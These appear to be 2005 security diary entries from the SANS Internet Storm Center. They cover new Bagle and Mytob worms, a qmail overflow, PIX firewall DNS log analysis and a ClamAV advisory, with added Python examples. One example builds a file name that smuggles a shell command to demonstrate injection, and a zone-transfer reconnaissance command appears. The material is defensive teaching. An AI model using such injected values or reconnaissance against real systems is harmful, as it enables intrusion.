Published: 2005-05-31

Virus Tuesday: New Bagels, New Mytob. ; qmail pop3 64bit issues

New Bagel Virus(es?)

We have received a few reports that readers are receiving what appears to be
a new version of the Bagle virus in email this morning. The attachments
(so far) appear to be named either as a single-digit number zip file
(eg: "5.zip" or "7.zip") or as a string (eg: "Be_not_jealous.zip"), with a
payload of "16_05_2005.exe" or "19_04_2005.exe". The .zip file is
approximately 18k and the extracted file is 36352 bytes. Upon execution, this file
will be copied to C:\WINDOWS\System32\winshost.exe
and will then drop another 11k file into

The registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run is then updated to execute this winshost.exe file at each logon.
The laudable VirusTotal has the following to say about the matter:

AntiVir 05.31.2005 Worm/Bagle.gen
AVG 718 05.31.2005 no virus found
Avira 05.31.2005 Worm/Bagle.gen
BitDefender 7.0 05.31.2005 Win32.Bagle.BO@mm
ClamAV devel-20050501 05.31.2005 Worm.Bagle.BB-gen
DrWeb 4.32b 05.31.2005 no virus found
eTrust-Iris 05.31.2005 no virus found
eTrust-Vet 05.31.2005 no virus found
Fortinet 05.30.2005 W32/Mitglieder.CD.gen-tr
Ikarus 2.32 05.31.2005 no virus found
Kaspersky 05.31.2005 no virus found
McAfee 4502 05.30.2005 no virus found
NOD32v2 1.1116 05.31.2005 probably unknown NewHeur_PE virus
Norman 5.70.10 05.30.2005 W32/Downloader
Panda 8.02.00 05.30.2005 Suspect File
Sybari 7.5.1314 05.31.2005 Troj/BagDl-Gen
Symantec 8.0 05.30.2005 Trojan.Tooso.B
VBA32 3.10.3 05.31.2005 suspected of Worm.Bagle.3

Kaspersky Labs have also posted MD5 hashes for these variants at

The two hashes are: f4271a7bd37b7502ecab0ec2964d87c6 and

New Mytob Virus

We're also getting reports of a new Mytob virus. It appears that this
one may be exploiting the MS05-016 vulnerability, as described in this
bugtraq posting:

Signature updates are starting to show up and catch this:

AntiVir 05.31.2005 Worm/Mytob.ED
AVG 718 05.31.2005 no virus found
Avira 05.31.2005 Worm/Mytob.ED
BitDefender 7.0 05.31.2005 Win32.Worm.Mytob.BC
ClamAV devel-20050501 05.31.2005 Worm.Mytob.AS
DrWeb 4.32b 05.31.2005 Win32.HLLM.MyDoom.44
eTrust-Iris 05.31.2005 Win32/Mytob.BC!Worm
eTrust-Vet 05.31.2005 no virus found
Fortinet 05.31.2005 W32/MyTob.BC-mm
Ikarus 2.32 05.31.2005 no virus found
Kaspersky 05.31.2005 Net-Worm.Win32.Mytob.bc
McAfee 4502 05.30.2005 no virus found
NOD32v2 1.1116 05.31.2005 Win32/Mytob.DC
Norman 5.70.10 05.30.2005 no virus found
Panda 8.02.00 05.31.2005 W32/Mytob.DW.worm
Sybari 7.5.1314 05.31.2005 Net-Worm.Win32.Mytob.bc
Symantec 8.0 05.30.2005 no virus found
VBA32 3.10.3 05.31.2005 suspected of I-Worm (double extension)


qmail pop3d remote root exploit (64 BIT ONLY)

The amazing Georgi Guninski has discovered an issue within qmail's pop3
daemon where it is subject to an integer overflow when built on 64 bit
platforms with greater than 8GB of addressable memory. 32 bit platforms
are not affected. Exploit code has been publicly released; patches have
not. The few of you running vulnerable systems may want to keep a close
watch on this issue. I find that I cannot recommend switching software,
as I fully expect this sort of 32/64-bit overflow bug to be found in many
more places in the future.
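The 32/64-bit failure mode referred to above, as an added Python model (not qmail's code, and not a reproduction of Guninski's finding): a byte counter kept in a C `int` is narrowed to 32 bits while the process on an LP64 host can really hold more than 2 GiB, so a limit check written against the int passes once the counter has wrapped negative. The MAX_MESSAGE ceiling and the 1 GiB chunk size are made up for the demonstration.

```python
# Added illustration of the 32/64-bit length-counter bug class. This models C
# integer semantics in Python and is NOT qmail's code; the ceiling and the
# chunk sizes are made up for the demonstration.

INT_MAX = 2**31 - 1           # C `int` on LP64 stays 32 bits wide
SIZE_MAX = 2**64 - 1          # size_t / pointers are 64 bits wide
MAX_MESSAGE = INT_MAX - 4096  # the service's intended ceiling (assumed)


def narrow_to_c_int(n):
    """Wrap a Python int the way gcc/clang narrow an out-of-range value to int."""
    return ((n + 2**31) % 2**32) - 2**31


class IntCounted:
    """Counts received bytes in a 32-bit signed int, as 32-bit-era code commonly
    did. On a 32-bit platform the process could never hold 2 GiB, so the wrap
    was unreachable; on a 64-bit host with enough memory it is reachable."""

    def __init__(self):
        self.total = 0

    def accept(self, chunk):
        new_total = narrow_to_c_int(self.total + chunk)
        if new_total > MAX_MESSAGE:      # guard written against the int value
            return False
        self.total = new_total           # may now be negative
        return True


class SizeCounted:
    """Same logic with a size_t-width counter and explicit overflow checks."""

    def __init__(self):
        self.total = 0

    def accept(self, chunk):
        if chunk > SIZE_MAX - self.total:      # would overflow size_t
            return False
        if self.total + chunk > MAX_MESSAGE:   # honest comparison, no wrap
            return False
        self.total += chunk
        return True


def feed(counter, chunk, rounds):
    """Offer `rounds` chunks of `chunk` bytes. Returns
    (chunks_accepted, final_counter_value, first_round_counter_went_negative)."""
    accepted = 0
    went_negative = None
    for r in range(1, rounds + 1):
        if not counter.accept(chunk):
            break
        accepted += 1
        if counter.total < 0 and went_negative is None:
            went_negative = r
    return accepted, counter.total, went_negative


if __name__ == "__main__":
    gib = 2**30
    print("int counter :", feed(IntCounted(), gib, 4))   # takes all 4 GiB, counter ends at 0
    print("size_t guard:", feed(SizeCounted(), gib, 4))  # stops after the first GiB
```

Once the int goes negative every later index computed from it is negative too, which is where the memory corruption in this bug class comes from; the size_t version refuses the second chunk because the comparison is done at the width of the address space.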


Published: 2005-05-30

openrbl.org is back; hackiis6.com is down? ; ezArmor upgrade issue; Memorial Day

openrbl.org is back

We received reports from a couple of folks today that the openrbl.org website is back up. The DNS A records for the site have been missing for a day or so.

hackiis6.com is down?

Windows IT Pro has had a challenge running since early May to try to hack a server running IIS6. The challenge goes through June 8. Yesterday we received reports that the server was no longer reachable. It may not have been hacked though; the issue may be DNS-related. Currently, SOA and NS records for hackiis6.com are non-existent. whois reports that the main DNS servers are ns[123].mdnsservice.com, but these servers do not appear to be providing data for this domain currently.

ezArmor Upgrade Issue

We received a report from Glenn Jarvis that after upgrading ezArmor to address the VetE.dll security issue (see diary entry from ), he started having problems with his computer running very slowly. The impacted computer is running Windows 98SE. After some troubleshooting, he ended up uninstalling ezArmor and reinstalling it without the latest upgrade and now his computer is running fine.

If anyone else has experienced any issues with the VetE.dll upgrade, we would be interested in hearing about it.

Memorial Day

For everyone in the US, I hope you are having a safe and enjoyable Memorial Day weekend. If the rain holds off in Virginia, we'll be having a barbecue here later this afternoon.


David Goldsmith

Handler On Duty

dgoldsmith _AT_ sans.org
Published: 2005-05-29

Analyzing evidence of DNS attacks in PIX firewall logs; Trojans for industrial espionage; openrbl.org offline?

Trojans for industrial espionage

A reader (thanks, Tal!) has alerted us to a developing story in Israel. It seems as if a number of renowned companies fell victim to an industrial espionage attack through custom-written trojan horses and viruses. Jerusalem Post has more: http://www.jpost.com/servlet/Satellite?pagename=JPost/JPArticle/ShowFull&cid=1117333096614
ISC reader Axel, doing a great job with using Google on the little solid information that has been made available on the incident so far, strongly suspects that the Trojan in question was what Symantec calls Trojan.Hotword (http://securityresponse.symantec.com/avcenter/venc/data/trojan.hotword.html).

openrbl.org offline?

It seems as if the spam sink openrbl.org has dropped off the net. The various orbl.net DNS servers are apparently up and reachable, but the "A" record for openrbl.org itself is gone.

Analyzing evidence of DNS attacks in PIX firewall logs

With the increase in traffic to DNS (port 53) that DShield (http://www.dshield.org/port_report.php?port=53) is seeing recently, I wanted to find out what the log of a Cisco PIX firewall protecting a DNS server could tell about incoming attacks. The answer, unfortunately, is: very little. But what little there is, is explained below.

The built-in IDS of a PIX firewall can generate four different DNS related log entries. The four alerts are:

%PIX-4-400034 IDS:6050 DNS HINFO Request Attack
This alert will go off if somebody requests a HINFO record from your DNS server. The request will still go through, unless you have configured the PIX to drop (#ip audit attack action drop) the offending packet. HINFO requests are very rare, and serve no real purpose other than to set off all sorts of perimeter IDS.

%PIX-4-400035 IDS:6051 DNS Zone Transfer Attack
This alert will trigger whenever someone tries a DNS zone transfer (aka download of all your DNS information) through the PIX. If you are hosting the primary DNS for a zone, and legitimate secondary DNS servers outside of your network are configured to host a copy of your zones, then this signature will fire every time the secondaries update. Yes, not very useful.

%PIX-4-400036 IDS:6052 DNS Zone Transfer from High Port Attack
This likely means that somebody just tried a "dig -t AXFR @yourdnsserver yourdomain.com" against your DNS server. Usually an indication of reconnaissance.

%PIX-4-400037 IDS:6053 DNS Request for All Records Attack
This log entry is the result of a "dig -t ANY" or "set type=ANY" in nslookup. These requests don't happen "by accident" in the wild, but still happen hundreds of times per day on a busy DNS server. My recommendation is to turn this signature off, or to simply and silently collect these log lines without any alerting configured on them.

Below are two samples of what the above alerts look like in a real-world PIX log:

May 26 14:45:11 %PIX-4-400034: IDS:6050 DNS host info request
from ATTACKER.231 to COMPANY.9 on interface outside
May 26 14:42:01 %PIX-4-400036: IDS:6052 DNS high zone transfer request
from ATTACKER.231 to COMPANY.9 on interface outside

Besides the built-in IDS, DNS packets can also get caught by other sanity checks built into the PIX firewall. Some examples are shown below.

May 26 16:00:42 %PIX-4-410001: Dropped UDP DNS request from
outside:ATTACKER.231/37467 to inside:COMPANY.9/53; packet
length 5200 bytes exceeds configured limit of 512 bytes

The above log entry suggests that somebody just ran afoul of the DNS packet length restrictions. 512 bytes is the default length restriction set by the "fixup protocol dns" command. In PIX versions >6.3.3, this length restriction can be changed through the "maximum-length" parameter. For PIX 7.0, the command has mutated from "fixup" to "inspect", but is otherwise unchanged. Seeing the above message in your logs does NOT necessarily mean that some nefarious bad guy is playing with your server; packet lengths above 512 bytes DO exist, especially if EDNS (RFC 2671) is being used, but a DNS request of 5200 bytes is a bit too much for natural occurrence.

May 26 14:02:23 %PIX-4-410001: Dropped UDP DNS reply from
outside:SOMEDNS.17/53 to inside:COMPANY.240/65233; packet
length 523 bytes exceeds configured limit of 512 bytes

This event can and does happen quite frequently. It means that a DNS request that originated inside your company (eg. on a client, or DNS forwarder) has been replied to with a DNS packet longer than 512 bytes. Especially if the far end (SOMEDNS) is running Windows 2003, chances are that the server will insist on using EDNS, and usually return too long an answer to still squeeze through the PIX. Usually not hostile.

May 26 16:01:33 %PIX-4-410001: Dropped UDP DNS reply from
outside:ATTACKER.231/14431 to inside:COMPANY.9/53; packet
length 560 bytes exceeds configured limit of 512 bytes

Similar to the above, but now our PIX is really confused. Note how the packet went from a high port to port 53, and therefore very likely is a DNS request rather than a reply as indicated in the message. This is usually a strong indication that the DNS packet has been tampered with.

%PIX-4-410001:UDP DNS packet dropped due to compression length check
of <n> bytes: actual length:<n1> bytes

This is a PIX log message that I haven't seen in the wild so far. Allegedly, it is being written if a very crafty DNS packet containing a looping pointer is detected by the PIX. If you have sample packets and sample log entries, please submit.
To finish, two samples of the odd ducks among PIX DNS log lines. Note the novel approach Cisco seems to take at math (9 exceeds 63). I haven't gotten to the bottom of this, but as far as I can tell, what they mean is "label length exceeds 63 by 9 characters"

May 26 13:24:33 %PIX-4-410001: Dropped UDP DNS reply from outside:SOMEDNS.17/53
to inside:COMPANY.240/61858; label length 9 bytes exceeds protocol limit of 63 bytes
May 26 16:02:42 %PIX-4-410001:Dropped UDP DNS reply from inside:COMPANY.9/37709
to outside:ATTACKER.231/53; label length 16 bytes exceeds protocol limit of 63 bytes

The first log line above only signifies that an external DNS server has responded to a query originating from your site with a reply containing a host name of which a "label" is longer than 63 characters. A "label" according to the DNS RFC (1035) is any component between dots in a host name. In DNS parlance, isc.sans.org consists of three labels, with lengths 3-4-3. Getting a label longer than 63 usually happens on "fancy" host names that are especially common when reverse-resolving IP addresses used on IRC networks. Seeing this log entry is quite rare, but not too much cause for concern.

Not so for the second sample above. Note how the PIX is dropping a DNS reply sent outbound from our DNS server. The firewall is also sufficiently confused to actually swap the port numbers; packet traces confirm that 53 is inside and 37709 at the attacker's site, as we would expect. So far I've only seen these log entries during a real attack against a DNS server, and they are usually caused by the attacker sending a non-standard packet and the DNS server (rather than swallowing it without reply) sending the packet back flagged as an error. Why the PIX apparently does not catch the inbound attack and only triggers on the outbound reply is still a mystery to me.
One strong caveat: DNS UDP requests can be easily spoofed and can show up in your logs with a different source address than the actual originator. Also, the "ANY" and "HINFO" requests can be relayed through an arbitrary DNS server that supports query recursion. So, before you take any action against an alleged offender, make sure you have a solid case (packet traces, and a good answer to "Probability that the source address was spoofed", as you were taught in Mike Poor's class :-)).
If you have other explanations or have seen additional DNS related log entries in your PIX firewall log, please let me know (http://isc.sans.org/contact.php).
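The rules of thumb laid out above, turned into an added Python classifier run over sample log lines (this is example code written for this page, not ISC or Cisco tooling). The sample lines reuse the seven quoted in this entry, joined onto single lines, plus two constructed IDS:6051/6053 lines; the set of legitimate secondaries and the 4096-byte EDNS figure are assumptions you would adjust for your own site.

```python
import re

# Hosts allowed to pull zones from our primary (assumed; fill in your secondaries).
LEGIT_SECONDARIES = {"SECONDARY.5"}
# Buffer size most EDNS resolvers advertise (assumption used as a sanity ceiling).
EDNS_TYPICAL_MAX = 4096

IDS_RE = re.compile(
    r"%PIX-4-40003[4-7]: IDS:(?P<sig>605[0-3]) (?P<desc>.+?) "
    r"from (?P<src>\S+) to (?P<dst>\S+) on interface (?P<iface>\S+)")
DROP_RE = re.compile(
    r"%PIX-4-410001:\s*Dropped UDP DNS (?P<kind>request|reply) from "
    r"(?P<sif>\w+):(?P<src>[^/\s]+)/(?P<sport>\d+) to "
    r"(?P<dif>\w+):(?P<dst>[^/\s]+)/(?P<dport>\d+); "
    r"(?P<check>packet length|label length) (?P<length>\d+) bytes exceeds "
    r"(?:configured|protocol) limit of \d+ bytes")
COMPRESSION_RE = re.compile(
    r"%PIX-4-410001:\s*UDP DNS packet dropped due to compression length check")

# Sample log: the lines quoted in the entry, plus two constructed IDS lines
# (index 2 and 3) for the zone-transfer and ANY signatures.
SAMPLE_LINES = [
    "May 26 14:45:11 %PIX-4-400034: IDS:6050 DNS host info request from ATTACKER.231 to COMPANY.9 on interface outside",
    "May 26 14:42:01 %PIX-4-400036: IDS:6052 DNS high zone transfer request from ATTACKER.231 to COMPANY.9 on interface outside",
    "May 26 15:10:05 %PIX-4-400035: IDS:6051 DNS zone transfer request from SECONDARY.5 to COMPANY.9 on interface outside",
    "May 26 15:12:44 %PIX-4-400037: IDS:6053 DNS all records request from ATTACKER.231 to COMPANY.9 on interface outside",
    "May 26 16:00:42 %PIX-4-410001: Dropped UDP DNS request from outside:ATTACKER.231/37467 to inside:COMPANY.9/53; packet length 5200 bytes exceeds configured limit of 512 bytes",
    "May 26 14:02:23 %PIX-4-410001: Dropped UDP DNS reply from outside:SOMEDNS.17/53 to inside:COMPANY.240/65233; packet length 523 bytes exceeds configured limit of 512 bytes",
    "May 26 16:01:33 %PIX-4-410001: Dropped UDP DNS reply from outside:ATTACKER.231/14431 to inside:COMPANY.9/53; packet length 560 bytes exceeds configured limit of 512 bytes",
    "May 26 13:24:33 %PIX-4-410001: Dropped UDP DNS reply from outside:SOMEDNS.17/53 to inside:COMPANY.240/61858; label length 9 bytes exceeds protocol limit of 63 bytes",
    "May 26 16:02:42 %PIX-4-410001:Dropped UDP DNS reply from inside:COMPANY.9/37709 to outside:ATTACKER.231/53; label length 16 bytes exceeds protocol limit of 63 bytes",
]


def classify(line):
    """Return (severity, remote_host, reason) for a PIX DNS line, else None.
    remote_host is the outside party the event should be attributed to."""
    m = IDS_RE.search(line)
    if m:
        sig, src = m["sig"], m["src"]
        if sig == "6050":
            return "recon", src, "HINFO query; no legitimate use, but may arrive via a recursive relay"
        if sig == "6051":
            if src in LEGIT_SECONDARIES:
                return "noise", src, "zone transfer by a known secondary"
            return "recon", src, "zone transfer attempt from an unknown host"
        if sig == "6052":
            return "recon", src, "AXFR from a high port (dig -t AXFR style)"
        return "noise", src, "ANY query; routine on a busy server, collect silently"
    if COMPRESSION_RE.search(line):
        return "attack", None, "looping compression pointer; crafted packet, capture it"
    m = DROP_RE.search(line)
    if not m:
        return None
    length, sport, dport = int(m["length"]), int(m["sport"]), int(m["dport"])
    if m["check"] == "label length":
        if m["sif"] == "inside" and dport == 53:
            # The PIX swapped the ports: this is our server's error reply to a malformed query.
            return "attack", m["dst"], "our DNS server answered a malformed query with an error"
        return "noise", m["src"], "over-long label in an answer to our own query; rare, usually benign"
    if dport == 53:
        # Bound for port 53, so a request whatever the PIX calls it.
        notes = ["oversize query to port 53"]
        if m["kind"] == "reply":
            notes.append("PIX labelled it a reply, likely a crafted packet")
        if length > EDNS_TYPICAL_MAX:
            notes.append(f"{length} bytes is beyond the usual EDNS buffer of {EDNS_TYPICAL_MAX}")
        return "suspicious", m["src"], "; ".join(notes)
    if sport == 53:
        return "noise", m["src"], f"{length}-byte reply to our own query, typically EDNS"
    return "suspicious", m["src"], "oversize UDP DNS between two non-53 ports"


def summarize(lines):
    """Worst severity seen per remote host; lines that are not PIX DNS events are skipped."""
    rank = {"noise": 0, "recon": 1, "suspicious": 2, "attack": 3}
    worst = {}
    for line in lines:
        result = classify(line)
        if result is None or result[1] is None:
            continue
        severity, host, _ = result
        if host not in worst or rank[severity] > rank[worst[host]]:
            worst[host] = severity
    return worst


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(classify(line))
    print(summarize(SAMPLE_LINES))
```

The direction test (destination port 53 means request, whatever the message says) is what separates the benign oversize EDNS answers from the two packets worth a closer look, and the outbound label-length reply is the only line here that gets the "attack" grade, matching the reading given above. The spoofing caveat still applies: a summary like this tells you which address to pull packet captures for, not whom to block.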

Daniel Wesemann

Email: echo "ebojfm/jtdAhnbjm/dpn" | perl -pe 's/(.)/chr(ord($1)-1)/ge'


Published: 2005-05-28

GAO Report on DHS; ezSTUB; Worm.Gibe.F; BlueTooth Security? ClamAv MACosX

Bluetooth security

Juha-Matti Laurio sent a link about bluetooth security.
A new article "Bluetooth Security Review", i.e. Part 2,
was published at SecurityFocus Infocus which includes "Easy Bluetooth security tips":

GAO report on DHS

GAO published a report on DHS challenges in fulfilling cybersecurity responsibilities.
In brief they state:
"DHS has Initiated Efforts that begin to address its responsibilities but more work remains."

In my personal opinion DHS is facing some tough challenges.
The bureaucracy required to organize such a large group of independently funded and semi-autonomous
departments will nearly always cause such an effort to proceed slowly and potentially never reach its goals.

You might want to add the "Mythical Man-Month" by Frederick P. Brooks, Jr. to your SUMMER reading list.
It's a short book of essays on software engineering.
Some of the management principles
can be applied outside of software development.

ClamAV local privilege escalation vulnerability for MACosX.

The advisory can be found here:

Here is their summary:
"Under the Mac OS file system (HFS) files are saved as two parts, data and
resource fork.  In ClamAV version 0.80rc4, support was added to copy
both the data and the resource fork when moving a virus infected file.
The mechanism they used was the Mac local system utility ditto.  While
there isn't a security issue with using the "ditto" command itself, the
system() call they use to execute it is insecure."
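The pattern the advisory describes, a command line built by string formatting and handed to the shell through system(), beside the argv-style call that avoids it, as an added Python example. This is not ClamAV's code and does not reproduce its fix; `cp` stands in for the Mac OS X `ditto` utility so the demo runs on any Unix, and the hostile file name is constructed.

```python
"""Added example, not ClamAV's code: shell-interpreted quarantine call beside
an argv-style replacement. `cp` stands in for `ditto` (assumption)."""
import os
import subprocess
import tempfile

COPY_TOOL = "cp"


def quarantine_via_shell(src, dst):
    """Builds one string and lets /bin/sh parse it, as system() does.
    Shell metacharacters in the file name become commands."""
    cmd = f"{COPY_TOOL} {src} {dst}"
    return subprocess.run(cmd, shell=True, capture_output=True).returncode


def quarantine_via_argv(src, dst):
    """Passes the file name as a single argv element; no shell is involved,
    so the name is data no matter what it contains."""
    return subprocess.run([COPY_TOOL, src, dst], capture_output=True).returncode


def demonstrate():
    """Use a file name that carries an injected command; report which path ran it.
    Returns (injected_by_shell, injected_by_argv)."""
    with tempfile.TemporaryDirectory() as d:
        marker = os.path.join(d, "injected")
        # A scanner quarantines whatever name the infected file arrived under;
        # an attacker who controls that name can pick one like this (constructed):
        hostile_name = f"{d}/virus; echo pwned > {marker}"

        quarantine_via_shell(hostile_name, os.path.join(d, "q1"))
        shell_hit = os.path.exists(marker)      # the echo ran: marker was created
        if shell_hit:
            os.remove(marker)

        quarantine_via_argv(hostile_name, os.path.join(d, "q2"))
        argv_hit = os.path.exists(marker)       # cp just fails on a bogus name
        return shell_hit, argv_hit


if __name__ == "__main__":
    print("shell path injected, argv path injected:", demonstrate())
```

If a shell is unavoidable (say the tool is only reachable through a wrapper script), every interpolated argument has to be quoted with shlex.quote first; the argv form needs no quoting at all, which is why it is the one to prefer for anything that handles attacker-chosen file names.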
An update can be found here:

Worm.Gibe.F being reported

Viatcheslav Fedorov received a bit of malware from Microsoft a ``Partner''
He stated it "Smelled like a trojan".
A few minutes later he wrote back stating
"Yep, that's Worm.Gibe.F"
Information on Gibe.F from:

"Gibe is a mass-mailing worm written in Visual Basic.
It disguises itself as a Microsoft security update"


A user wrote in asking about ezStub3.dll.
Fellow handler Tony Carothers answered:
This file is typically linked with the "Adware.Ezula" strain of
spyware/adware.  From Symantec: "Adware.Ezula alters Web pages viewed
in Internet Explorer and can add extra links to certain keywords that
advertisers target. This adware runs under the name TopText."  As with
any other adware, there are several ways to remove this;
Spyware/adware removal tools, such as SpyBot S&D; Some AntiVirus
applications have the ability to prevent, detect, and remove these; or
manually, which is the most difficult and typically not the preferred.
My research discovered this information.
It was "discovered" as one of the many "nice" malware additions
that were scheduled to be installed later during Tom Liston's "follow the bouncing malware II".
If you missed Tom's malware forensics-humor it here:

Information and removal instructions for ezStub3.dll.
CA SecurityAdvisor

SpyBot SandD
I hope everyone has a good weekend.
Those of you celebrating Memorial Day, enjoy yourselves, but
PLEASE drive safely both on the roads and on the internet.
Donald.Smith hex_to_ascii(40 base16)qwest.com


Published: 2005-05-27

The SPAM People;Thanks;Package Verification

The SPAM People

Do you know anyone that has made a purchase off a SPAM? I've been told these people exist. What maybe 1 in 1,000,000 SPAMs results in a sale. I'm just fascinated by the thought. Do they walk down the street like you and me? Would I recognize one if I saw one? Are they related to the people that watch infomercials not in jest?
Then again I met someone the other day that was actively corresponding with "women" in "Nigeria" that were interested in becoming brides in the US, but had a few checks they needed cashed first. Same person also didn't realize The Onion was satire and not to be taken literally. Sigh.


A big thanks to all of you that have written in with details from your digging around or that have uploaded files, phishing info, and suggestions. It's of great benefit for all those that seek to understand.

I wonder how many malware dissectors also liked to take things apart as a child? Old toasters, can openers. Anything with a motor. Never quite could get them all back together. Especially things with springs.

Package Verification

How many of you verify the integrity of your software before you install it? Where is it coming from? Who wrote it? What changes does it make to your system? Did the package you downloaded contain any "enhancements" inserted without the author's knowledge (keyloggers, backdoors, etc.)?
Answering the first couple of questions just takes an inquisitive mind and a little common sense. Answering the last one takes a little grunt work and the right tools to verify the file (rpm, gnupg, md5sum, etc.).
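The "grunt work" part, as an added Python example (not from the diary): check a download directory against a sha256sum-style manifest and report what is intact, altered, missing, or never listed. SHA-256 is used rather than MD5 because MD5 collisions have been practical since 2004; and a checksum file fetched from the same server as the package only proves the download arrived intact, so origin still has to come from a signature over the manifest (gpg --verify on a detached .asc, with a key you obtained some other way). All file names and contents below are constructed.

```python
"""Added example (not from the diary): verify downloaded packages against a
sha256sum-style manifest. File names and hashes below are constructed."""
import hashlib
import hmac
import os
import tempfile


def sha256_file(path, chunk=1 << 16):
    """Hash a file in chunks so large packages are not read into memory whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_manifest(text):
    """Parse `sha256sum` output: '<64 hex>  <name>' (or ' *<name>' for binary mode).
    Malformed lines raise rather than silently letting a file through unchecked."""
    entries = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            digest, name = line.split(None, 1)
        except ValueError:
            raise ValueError(f"manifest line {lineno}: expected '<hash>  <name>'")
        name = name.lstrip("*")
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest.lower()):
            raise ValueError(f"manifest line {lineno}: not a SHA-256 hex digest")
        if os.path.basename(name) != name:
            raise ValueError(f"manifest line {lineno}: path components not allowed")
        entries[name] = digest.lower()
    return entries


def verify_tree(manifest_text, base_dir):
    """Return {file_name: 'OK' | 'FAILED' | 'MISSING' | 'UNLISTED'} for base_dir."""
    expected = parse_manifest(manifest_text)
    status = {}
    for name, digest in expected.items():
        path = os.path.join(base_dir, name)
        if not os.path.isfile(path):
            status[name] = "MISSING"
            continue
        actual = sha256_file(path)
        # constant-time compare is cheap insurance when this runs inside a service
        status[name] = "OK" if hmac.compare_digest(actual, digest) else "FAILED"
    for name in sorted(os.listdir(base_dir)):
        if name not in expected and name != "SHA256SUMS":
            status[name] = "UNLISTED"   # present on disk, vouched for by nobody
    return status


def demo():
    """Constructed scenario: one good package, one tampered, one absent, one unlisted."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "tool-1.0.tar.gz")
        with open(good, "wb") as f:
            f.write(b"pretend tarball contents\n")
        with open(os.path.join(d, "tool-1.1.tar.gz"), "wb") as f:
            f.write(b"tampered tarball contents\n")
        with open(os.path.join(d, "extra.bin"), "wb") as f:
            f.write(b"not in the manifest\n")
        manifest = "\n".join([
            f"{sha256_file(good)}  tool-1.0.tar.gz",
            f"{'0' * 64}  tool-1.1.tar.gz",    # wrong digest, simulates tampering
            f"{'f' * 64} *tool-1.2.tar.gz",    # listed but never downloaded
        ])
        with open(os.path.join(d, "SHA256SUMS"), "w") as f:
            f.write(manifest)
        return verify_tree(manifest, d)


if __name__ == "__main__":
    for name, state in demo().items():
        print(f"{state:8} {name}")
```

The UNLISTED state is the one people forget: a file that nobody's manifest mentions is exactly where an "enhancement" slipped into a mirror would live, so treat it as unverified rather than as harmless.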





For those in the US, have a good, safe holiday this weekend and remember those that have given their lives in battle on Monday.


Robert Danford
SANS Internet Storm Center Handler


Published: 2005-05-26

New poll; DNS spikes; Witty worm analysis; LISTSERV vuln; ZoneAlarm clarification

New poll: Snort interface

Check out the new poll to the right about which Snort
alerting/management interface you like best.

DNS spikes

Some folks have reported strange DNS activity that is occurring in
spikes. The traffic doesn't seem to decode into anything usable
according to the DNS protocols. If you have observed anything strange
in DNS land lately (over UDP), please send over some packet captures.
*joking:* Or it could just be Kaminsky playing around with real-time video
bouncing off public DNS servers. Maybe he's got Episode 3 up there?

Extensive statistical analysis of last year's Witty worm

A new paper has been released that analyzes a huge amount of data from
the Witty worm of March 2004. This paper makes some interesting
conclusions about the initial "Patient 0" and the initial target hit
list that it was seeded with.

The paper: http://www.cc.gatech.edu/~akumar/witty.html

A good article from Rob Lemos at SecurityFocus with some interesting
theories about the author of the worm:

Serious vulnerability in L-Soft LISTSERV

A serious vulnerability was released today by NGS Software that affects
the L-Soft LISTSERV mailing list software. If you run this software,
you are strongly advised to update to the latest version:



ZoneAlarm products that are vulnerable to CA VET bug

We reported earlier this week that several ZoneAlarm products include
the VET library from Computer Associates, which has a serious
vulnerability. Today, ZoneLabs released a list of products that include
the anti-virus engine which contains the vulnerable VET dll:

Affected Products:

* ZoneAlarm Anti-virus

* ZoneAlarm Security Suite

Unaffected Products:

* ZoneAlarm and ZoneAlarm Pro

* Check Point Integrity clients and Integrity Server

* Integrity Clientless Security products


Published: 2005-05-25

Summer/Winter Vacation Book Suggestions and Hacking Challenges

Today’s blog-fest is done…

If you want to read yesterday’s fascinating diary from handler extraordinaire Scott Fendley, click

Update on CA Antivirus Vet Library Vulnerability

Yesterday’s diary mentioned that it could be tough for consumers to determine if they have a vulnerable version of the Vet Library. CA has published detailed directions on how to do this in their advisories, and they’re pretty straightforward. For details, please check out the EZ Antivirus/Armor product support site at

Also, you can look at these detailed instructions for checking product versions: http://crm.my-etrust.com/login.asp?username=guest&target=DOCUMENT&openparameter=89

These links were also included in the original advisory CA sent to
BugTraq, NTBugTraq, SecurityFocus, FrSIRT, Secunia, CERT, US-CERT,
OSVDB, ISS X-Force, SecurityTracker, PacketStorm, Mitre CVE,
SecuriTeam, and Full-Disclosure (among others).

CA pointed out to us: “Our advisory and web site advisory page both list affected versions, how to determine which version you have, and what you need to do to protect yourself. Vet engine 11.9.1 or later indicates that you are protected if you are using any of our corporate products, or the latest major releases of our consumer products (EZ Antivirus 7.x and EZ Armor 3.x). Users of EZ Armor 2.4.4 should upgrade to v3.1. This is of course a free upgrade for all licensed users.”

A Little Websense Trouble with Google and Other Redirect Issues

Reader Hal Logan wrote in to tell us that his websense proxy started blocking users this morning when they clicked on Google search results done through the Google search bar, or when Google had set a cookie in the browser. It appears that when a user searched for “Internet Storm Center”, the Google search bar (or regular Google with the cookie) gave results that pointed to Google, but with a redirect to isc.sans.org. Given this unexpected redirect result, websense filtered this as being “Phishing or other Fraud.” To handle this, Hal and his team had to put google.com in a whitelist for their Websense systems. Thanks for the heads up!

UPDATE: Christian Wyglendowski (type that 3 times fast) sent us a phish message that included a URL with a redirect off of a server in the zdnet.com domain going to the phisher’s bogus website. The phish dudes must be thinking that URL/URI blocklists will let the request to zdnet through. As of now, it looks like the zdnet folks have disabled the redirector. Watch for more of this redirection nastiness in the near future!

Books for Summer/Winter Vacation/Holiday

I was dreaming when I wrote this.

Forgive me if it goes astray.

But when I woke up this morning,

I was shocked to see the end of May!

Yes, folks, the end of May is upon us. Before long, those of us in the Northern Hemisphere will be lazily frolicking at the beach and enjoying Summer barbeques. Readers in the Southern Hemisphere will soon enjoy hot chocolate at the ski lodge, NOP sledding with the kiddies, and snowball fights in places like the Australian Outback, the Brazilian Rainforests, and Sub-Saharan Africa. With a little time off for vacation/holiday, I like to curl up with an engrossing information security book, as I’m sure all of you do as well.

But, new infosec books are released all the time, and it can be hard to keep up with the latest and greatest. Not all of us have a
ability to devour, analyze, and comment intelligently on each and every book our industry churns out.

